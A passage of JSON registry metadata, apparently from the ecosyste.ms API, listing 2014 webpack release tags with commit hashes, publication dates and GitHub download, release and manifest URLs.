itHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ec